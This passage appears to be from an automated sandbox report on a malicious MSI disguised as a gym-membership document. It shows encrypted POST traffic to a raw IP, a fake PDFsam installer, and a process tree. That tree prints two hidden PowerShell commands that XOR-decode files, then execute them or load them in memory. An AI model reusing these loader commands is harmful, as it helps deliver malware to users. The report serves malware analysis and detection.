                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 81 9f 47 2a b1 32 b5 54 2b 9f f0 00 f1 ef 31 90 e1 53 94 9b 02 31 29 56 a6 94 8d f5 63 0f e3 34 13 d1 4b 05 03 5e 81 20 2e 87 f8 ac af 20 b5 ab d4 63 37 2c 95 16 7d 65 98 e7 d4 3d 07 e8 38 5a b2 90 5e fd 41 db a2 62 51 35 e7 4b 73 35 79 56 0e 78 33 7c 60 57 18 a8 41 94 e6 d7
                                                                                                    Data Ascii: G*2T+1S1)Vc4K^ . c7,}e=8Z^AbQ5Ks5yVx3|`WA
                                                                                                    Oct 4, 2021 21:30:07.055438042 CEST2809OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 569
                                                                                                    Oct 4, 2021 21:30:07.840841055 CEST2811INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 284
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: b9 ef 3e 22 2a d1 61 89 58 1e 50 d8 e9 9d 9c 1c 47 79 64 aa 36 4a a2 0e d7 30 7f 04 8b 51 12 38 3b 91 ad 26 cc 86 95 80 53 62 e9 f4 46 8f 46 b1 5f f7 78 3b e9 1b 30 a6 d8 d5 14 5c d5 74 42 9a b9 14 83 68 f6 14 5d 27 30 85 d6 56 37 fc d9 37 a3 f8 09 13 4b 8f cd 62 98 44 bb 69 3c 45 88 e9 ca cd fd f3 e9 93 56 e3 fa 09 1f 74 da 18 5d 03 1b 5e 92 92 37 57 86 2b 5d 8d 4c 80 a9 6c 5d ba 47 74 02 25 02 44 d7 3f d0 04 8c e3 23 b9 c6 2d df 98 b2 c8 d6 b6 83 b9 1b 6a 6a 85 bb 14 4a f8 ff e9 51 2a 39 ab 07 e6 de b9 20 59 fa 53 3f 0e 3d a1 61 22 f3 8d 9b 20 3c 32 be af 76 b3 19 60 8a c1 63 b4 3f 27 23 ed 7b d6 62 00 15 de b8 e2 6d 86 1b 38 8c 15 fb b5 00 49 8f 78 d3 07 14 54 a4 cc 8c df bf 86 c5 0a 12 8a 81 41 80 45 b1 e8 1e b7 64 74 a7 bf a5 3d e3 cb 40 a0 46 72 fa 74 47 42 9b 65 c3 5d 20 e1 f8 99 0a 00 ae 53 f0 99 52 6c b8 7e b7 42 3c 8c 12 a6 ed 99
                                                                                                    Data Ascii: >"*aXPGyd6J0Q8;&SbFF_x;0\tBh]'0V77KbDi<EVt]^7W+]Ll]Gt%D?#-jjJQ*9 YS?=a" <2v`c?'#{bm8IxTAEdt=@FrtGBe] SRl~B<
                                                                                                    Oct 4, 2021 21:30:07.956737041 CEST2812OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 521
                                                                                                    Oct 4, 2021 21:30:08.702217102 CEST2813INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 163
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: aa 42 45 6b a7 e4 65 72 2a 30 f3 5b ff 61 54 a4 99 1a 17 d5 3d 95 be 16 20 71 4c 01 01 09 11 fe ca fe ac d0 9a 85 7f 03 5a 69 be 18 ac 5a fe fd a7 a3 ac f7 96 e6 2e 4e 18 b2 fa 38 84 2d 5d e6 db c4 8e 02 87 a9 a4 b4 12 60 6e f2 aa f2 86 1b be c3 00 08 38 44 3d 1c 6c 0c 52 a0 50 e8 05 2c c8 8e 47 45 4e 02 c8 e3 01 51 79 df cc 46 d9 90 b1 db da 1d 28 05 cf c1 a1 e7 ef 9e ca 44 2e 92 10 ad 7c 0d 9d 14 d9 6a fa 1f e2 78 47 22 3d 67 c1 01 9f 9c 0e c1 57 fc d8 43 a9 de a2 44 76 0c 9e cc fe
                                                                                                    Data Ascii: BEker*0[aT= qLZiZ.N8-]`n8D=lRP,GENQyF(D.|jxG"=gWCDv
                                                                                                    Oct 4, 2021 21:30:08.816289902 CEST2814OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 668
                                                                                                    Oct 4, 2021 21:30:09.605701923 CEST2816INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 235
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: c8 29 1a 1b 09 3a d7 99 23 44 c5 6e b8 8c 88 f0 75 26 b6 cb a2 fb b7 56 fe 64 ad b2 bf c3 a8 96 0b 0d 2d d9 12 b0 99 a0 92 fc 7f ef 74 b5 7d 19 61 32 fd 23 56 0b e7 13 be 73 18 aa e9 71 f4 18 66 4f 6a ef b1 48 a6 0f 6a d1 3c 5d 3a b8 4f 1c 85 a0 1e 8f 7c d3 b0 8a 34 df 52 73 3d 85 69 b9 bf 8b ec 8b 23 9a ca c3 43 6e 48 bb 22 61 ed 3e a7 36 d7 fb 1c 5b 99 31 06 25 38 fa 4d 76 34 70 74 3f 95 86 7f 75 8d e6 79 85 7e 0f 99 b0 bd c6 8b 9b 97 60 ca e4 fe da 84 29 00 38 e2 b7 5b b5 41 c3 93 63 56 ed 1d 06 42 09 e1 84 6d 2e 84 3a 68 e8 cc 70 34 c8 38 81 09 52 06 d8 5d 78 20 c3 07 8c 90 bc 8a f8 33 40 c9 1f d0 80 6e cd eb b4 4f 01 3b 34 82 ad 0f 5c fa 81 f6 1c f1 65 b4 1f c3 0d 41 1d c3 51 20 92 9f 2b 8b
                                                                                                    Data Ascii: ):#Dnu&Vd-t}a2#VsqfOjHj<]:O|4Rs=i#CnH"a>6[1%8Mv4pt?uy~`)8[AcVBm.:hp48R]x 3@nO;4\eAQ +
                                                                                                    Oct 4, 2021 21:30:09.722656012 CEST2817OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 410
                                                                                                    Oct 4, 2021 21:30:10.501885891 CEST2818INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 279
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: b7 52 98 55 b2 a2 cc 67 5b 13 f2 8a 86 34 e4 6c 53 93 01 5e 32 f6 71 74 c4 11 ba b8 83 10 a6 56 95 41 ed df 2b f7 b9 08 c7 0f fd d0 d8 dc b2 fa 54 c1 e0 56 9a 68 08 e8 4d bb 5d 8e ce 16 49 6e 9a 1c 09 36 28 18 28 b8 b5 5f 1e 6e 52 f2 d5 d1 3a f2 25 0f 16 c7 4d 08 69 e1 29 3a ca 03 68 24 1c a3 44 5c 4a 32 8b 6a 52 9c ff 94 46 d3 c8 e7 93 c8 3b 3b 04 26 cd 4c 74 ff 63 f0 86 08 e1 84 49 77 ca d4 7b f4 29 b2 6d 03 a3 cf c6 ed be 8e 8b c2 98 39 a0 56 f5 86 96 9b 18 5a 97 79 cc ba 10 85 cc e5 49 19 51 23 c9 6c ce 89 b1 9a bc c6 95 44 3d ec 88 9a 13 89 2a f6 c5 a6 50 fc e6 ec 6e 50 7a ed 46 8a 00 77 fc 63 8f 10 04 65 c2 b1 fd c2 8a 89 e5 11 32 06 62 f7 13 50 ea ea 44 a7 93 45 1a 78 9a fd eb 77 78 3c cf 23 d5 f7 c2 fb 7a 28 39 c1 7e e6 cc 7f 08 43 4b d9 cb 15 c2 53 b0 ee 62 07 5d 8a 92 da b7 34 fe 7a 86 c5 2d 77 90 9c b9 10 ef 03 9d
                                                                                                    Data Ascii: RUg[4lS^2qtVA+TVhM]In6((_nR:%Mi):h$D\J2jRF;;&LtcIw{)m9VZyIQ#lD=*PnPzFwce2bPDExwx<#z(9~CKSb]4z-w
                                                                                                    Oct 4, 2021 21:30:10.623146057 CEST2819OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 645
                                                                                                    Oct 4, 2021 21:30:11.375560999 CEST2821INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 207
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: d7 df c4 7d 54 84 45 8c 66 3e e4 85 e2 45 3c 68 a0 8c fd a9 c3 a1 22 67 c2 ff a7 7c fb 2b 89 e2 ce a5 59 15 41 9b fa 36 ea 7e 67 47 eb 7c 80 d4 70 82 0b fb c4 c9 3d 7d c6 e8 8b ef 43 d7 20 79 22 c0 2f b8 7c 82 18 0b 1a 6b 70 67 9e 49 ff 58 1e 33 32 87 83 0b a7 d9 50 74 7d 57 7e 40 6a 5f a8 6f d0 a7 1e e9 9d b0 c4 b5 6c 6e 36 b1 03 81 4a 1b de b8 63 07 8d 22 5b b5 2a 48 58 46 00 c2 14 66 db dd 17 d2 5a 34 5d c7 af 78 69 53 92 84 6f 0b 73 d1 14 67 26 a9 57 0d 2d 59 e8 27 d3 d1 4d 03 a9 e3 2e e4 7d cc 37 5d 8e 2a b6 b2 e1 3e 25 be 2f 65 70 45 40 36 be d2 a3 e0 c8 25 85 5a 5d eb 24 3d 09 60 76 ab cd c5 a7 9b 4a 57 a1
                                                                                                    Data Ascii: }TEf>E<h"g|+YA6~gG|p=}C y"/|kpgIX32Pt}W~@j_oln6Jc"[*HXFfZ4]xiSosg&W-Y'M.}7]*>%/epE@6%Z]$=`vJW
                                                                                                    Oct 4, 2021 21:30:11.489234924 CEST2822OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 674
                                                                                                    Oct 4, 2021 21:30:12.253351927 CEST2823INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 327
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: a7 4e 1a 4b 98 66 67 61 e3 c2 9b c4 4b af cf ec c1 5a 64 6f 22 3d c3 c7 06 1e 97 69 8e f6 dc 04 cd b9 3f 79 38 6a 37 f0 eb 4e 41 72 e8 32 b9 9b 54 a0 1c 7f e5 42 83 63 ef 70 4e 1b 3e 1b 96 6b 27 9d 9e 7a 8a 4e c2 b2 ca 2d e3 bb 91 1a 7c 6e 02 6e 8f 6c 37 8f c1 ad 90 d1 cd 59 47 76 13 02 95 ad d8 77 66 c1 b9 6c 66 ce 3c d7 91 b4 3f 20 27 69 9d 27 18 13 c3 48 2d 18 c7 71 7c 05 da be 1b 78 2d ed 9b 69 b9 d8 f2 63 0c 60 12 54 0e 1e 66 20 22 28 32 73 3a 5e cc 85 a4 fb e8 58 67 da ef 27 a3 5b 78 47 29 2e 8a 99 cd a1 21 05 78 23 f2 b1 97 57 e5 2c 6d e5 f4 91 d9 89 10 bf 1d cb 5c da c4 f4 5e 56 a1 e7 2a 08 a2 24 b7 db db 5e 57 18 ec 2f 50 75 8d ec 1d 5b d6 87 b2 4e 5c 79 0e 19 c7 da 1a 79 41 3e 2f fd c4 35 b0 f1 06 9f 62 fc 11 0b 1f b8 00 1e b0 34 0f 3f ff cd 9d 79 58 e7 45 45 37 2d ea 40 4c f4 24 de b4 48 3b ae 42 05 2a 2b a7 46 52 98 42 91 ac a5 d7 d3 dc 6c 2f a0 ec 59 4c 5d 35 2d 7c 2c 14 f4 d8 0d 1b 42 cb e9 62 a8 ed a6 b6 6f ab ec e3 0b ae 8e a3 a6 96 99 6a 2f 13 ef cb
                                                                                                    Data Ascii: NKfgaKZdo"=i?y8j7NAr2TBcpN>k'zN-|nnl7YGvwflf<? 'i'H-q|x-ic`Tf "(2s:^Xg'[xG).!x#W,m\^V*$^W/Pu[N\yyA>/5b4?yXEE7-@L$H;B*+FRBl/YL]5-|,Bboj/
                                                                                                    Oct 4, 2021 21:30:12.364031076 CEST2824OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 623
                                                                                                    Oct 4, 2021 21:30:13.173711061 CEST2826INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 106
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 8b f1 6f a9 18 86 6c 0d 0d 57 a1 3d 68 90 43 df 18 d5 ed 8a ad 17 6b 1b 12 00 13 9e f4 df e4 2e c7 48 74 23 db d6 cf bc a1 c1 35 99 da a4 bb 3e 01 f4 71 b9 03 15 90 bd 9a 4e 8f 5d 5c 8e 3f 03 48 93 2e fb 86 15 04 35 1d d3 7d 36 e3 9b 3b 62 7e 4a 32 49 b1 79 d7 20 bd 60 53 cf 49 fc 32 71 00 89 8a 41 bb 25 85 ea 63 d4
                                                                                                    Data Ascii: olW=hCk.Ht#5>qN]\?H.5}6;b~J2Iy `SI2qA%c
                                                                                                    Oct 4, 2021 21:30:51.147770882 CEST2827OUTPOST / HTTP/1.1
                                                                                                    Host: 146.70.41.157
                                                                                                    Content-Length: 403
                                                                                                    Oct 4, 2021 21:30:51.905977964 CEST2828INHTTP/1.1 200 OK
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Content-Length: 125
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 29 a2 83 b1 8f bc f6 3d 38 a8 9e 8a 21 29 eb 5e 2a c3 d7 c0 6e f4 1a 1d 94 a5 3e 20 77 44 b7 8d d0 ad c1 08 b5 81 15 e1 22 f3 fb 9a 00 2b 92 b1 38 57 7f c9 b4 b3 5f 05 62 c7 f8 90 02 8a c4 2a 35 6d ba 9f c3 69 e6 72 f6 f4 cd fc 57 33 e6 9f b6 f5 22 85 e5 2d 61 41 0c 0d f7 28 e7 13 bc 69 1d f8 af 55 f4 db 85 d9 7f d8 88 95 f3 95 4a 2d 57 31 f6 60 b6 82 85 cc 8a c5 e8 90 01
                                                                                                    Data Ascii: )=8!)^*n> wD"+8W_b*5mirW3"-aA(iUJ-W1`


                                                                                                    HTTPS Proxied Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    0192.168.2.44978564.15.159.234443C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    2021-10-04 19:28:36 UTC0OUTPOST /ipservice.asmx HTTP/1.1
                                                                                                    Accept: text/*
                                                                                                    SOAPAction: "http://upclick.com/GetLocationInfo"
                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                    User-Agent: VCSoapClient
                                                                                                    Host: wsgeoip.pdfsam.org
                                                                                                    Content-Length: 346
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2021-10-04 19:28:36 UTC0OUTData Raw: 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 65 6e 63 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 47 65 74 4c 6f 63 61 74 69 6f 6e 49 6e 66 6f 20
                                                                                                    Data Ascii: <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"><soap:Body><GetLocationInfo
                                                                                                    2021-10-04 19:28:36 UTC0INHTTP/1.1 200 OK
                                                                                                    Cache-Control: private, max-age=0
                                                                                                    Content-Type: text/xml; charset=utf-8
                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                    X-AspNet-Version: 2.0.50727
                                                                                                    X-Powered-By: ASP.NET
                                                                                                    Date: Mon, 04 Oct 2021 19:28:34 GMT
                                                                                                    Connection: close
                                                                                                    Content-Length: 576
                                                                                                    2021-10-04 19:28:36 UTC0INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 47 65 74 4c 6f 63 61 74 69 6f 6e 49 6e 66 6f 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a
                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><GetLocationInfoResponse xmlns="http:


                                                                                                    Code Manipulations

                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    Analysis Process: msiexec.exe PID: 6320 Parent PID: 5952

                                                                                                    General

                                                                                                    Start time:21:28:07
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Nyship-Empire-Plan-Gym-Membership.msi'
                                                                                                    Imagebase:0x7ff777c90000
                                                                                                    File size:66048 bytes
                                                                                                    MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Chronological Activities

                                                                                                    Analysis Process: msiexec.exe PID: 4660 Parent PID: 568

                                                                                                    General

                                                                                                    Start time:21:28:08
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                    Imagebase:0x7ff777c90000
                                                                                                    File size:66048 bytes
                                                                                                    MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Chronological Activities

                                                                                                    Analysis Process: msiexec.exe PID: 5732 Parent PID: 4660

                                                                                                    General

                                                                                                    Start time:21:28:09
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\MsiExec.exe -Embedding B7C7A506E4E2E0AFFC1F9F29629DA729 C
                                                                                                    Imagebase:0x7ff777c90000
                                                                                                    File size:66048 bytes
                                                                                                    MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Chronological Activities

                                                                                                    Analysis Process: msiexec.exe PID: 6024 Parent PID: 4660

                                                                                                    General

                                                                                                    Start time:21:28:10
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 9EA879A27423DE072DACED38067EC0CA
                                                                                                    Imagebase:0x10000
                                                                                                    File size:59904 bytes
                                                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Chronological Activities

                                                                                                    Analysis Process: msiexec.exe PID: 6656 Parent PID: 4660

                                                                                                    General

                                                                                                    Start time:21:28:11
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1
                                                                                                    Imagebase:0x7ff777c90000
                                                                                                    File size:66048 bytes
                                                                                                    MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Chronological Activities

                                                                                                    Analysis Process: PDFsamEnhanced7Installer.exe PID: 616 Parent PID: 6656

                                                                                                    General

                                                                                                    Start time:21:28:15
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe'
                                                                                                    Imagebase:0xfb0000
                                                                                                    File size:16852824 bytes
                                                                                                    MD5 hash:801B1B11E979AF812CA4387E5F438AD8
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 6%, Metadefender, Browse
                                                                                                    • Detection: 20%, ReversingLabs
                                                                                                    Reputation:low

                                                                                                    Chronological Activities

                                                                                                    Analysis Process: powershell.exe PID: 2212 Parent PID: 6656

                                                                                                    General

                                                                                                    Start time:21:28:18
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;'
                                                                                                    Imagebase:0x7ff7bedd0000
                                                                                                    File size:447488 bytes
                                                                                                    MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                    Yara matches:
                                                                                                    • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000009.00000003.740405887.000001B512853000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                    • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000009.00000003.749058298.000001B512853000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                    • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000009.00000003.739854732.000001B512853000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                    • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000009.00000003.746350232.000001B512853000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                    • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000009.00000003.749409808.000001B512853000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                    • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000009.00000003.750055391.000001B512853000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                    • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000009.00000003.742546203.000001B512853000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                    Reputation:high

                                                                                                    Chronological Activities

                                                                                                    Analysis Process: conhost.exe PID: 2340 Parent PID: 2212

                                                                                                    General

                                                                                                    Start time:21:28:18
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff724c50000
                                                                                                    File size:625664 bytes
                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Chronological Activities

                                                                                                    Analysis Process: regsvr32.exe PID: 6964 Parent PID: 616

                                                                                                    General

                                                                                                    Start time:21:28:24
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:regsvr32.exe /s 'C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll'
                                                                                                    Imagebase:0xf80000
                                                                                                    File size:20992 bytes
                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high

                                                                                                    Chronological Activities

                                                                                                    Analysis Process: PDFsam_Enhanced_7_Installer.exe PID: 7016 Parent PID: 616

                                                                                                    General

                                                                                                    Start time:21:28:26
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:'C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe' /RegServer
                                                                                                    Imagebase:0x3a0000
                                                                                                    File size:16852824 bytes
                                                                                                    MD5 hash:801B1B11E979AF812CA4387E5F438AD8
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 6%, Metadefender, Browse
                                                                                                    • Detection: 20%, ReversingLabs
                                                                                                    Reputation:low

                                                                                                    Chronological Activities

                                                                                                    Analysis Process: powershell.exe PID: 6916 Parent PID: 3424

                                                                                                    General

                                                                                                    Start time:21:29:03
                                                                                                    Start date:04/10/2021
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:'PowerShell.exe' -WINDOWsTyLe HIdden -Ep bYPass -CoMmaND '$ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d5944397119672019e333++){$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252]=$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252] -bxoR $ac46caf9ffc4c7b839941d3e2c350[$a4e46636d5944397119672019e333];$aef4ae006e446f92dc4680e0da252++;IF($aef4ae006e446f92dc4680e0da252 -GE $aae4ceb7c424279fcf464cdcde86d.coUNT){$a4e46636d5944397119672019e333=$ac46caf9ffc4c7b839941d3e2c350.lenGtH}}};[sYsTeM.ReflEcTIon.asseMbLy]::lOAd($aae4ceb7c424279fcf464cdcde86d);[a58b92819f74a08223fbd41c9efcf.a081375717c4dabd0e9d5ff272624]::a2311544abd4fcba55524af320681()'
